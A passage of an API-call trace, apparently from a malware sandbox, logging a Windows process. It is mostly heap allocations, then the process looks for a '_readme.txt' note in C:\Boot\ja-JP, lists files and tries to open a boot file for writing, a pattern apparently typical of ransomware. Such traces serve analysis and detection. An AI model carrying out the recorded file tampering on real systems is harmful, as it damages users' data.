0x33302e8 [0097.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.178] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.179] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0097.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.179] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.179] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.179] PathFindFileNameW (pszPath="") returned="" [0097.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.179] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.180] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.181] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.181] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.181] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0097.181] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.181] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.181] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.181] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.181] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.181] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.181] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.181] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.181] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.181] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b79750 [0097.181] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0097.181] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.181] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.181] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0097.181] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.181] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.182] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19639e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19639e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.182] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19639e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19639e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.182] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.182] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned=".mui" [0097.182] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.182] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19639e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19639e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19639e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.182] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned=".txt" [0097.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.182] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19639e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19639e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19639e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.183] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 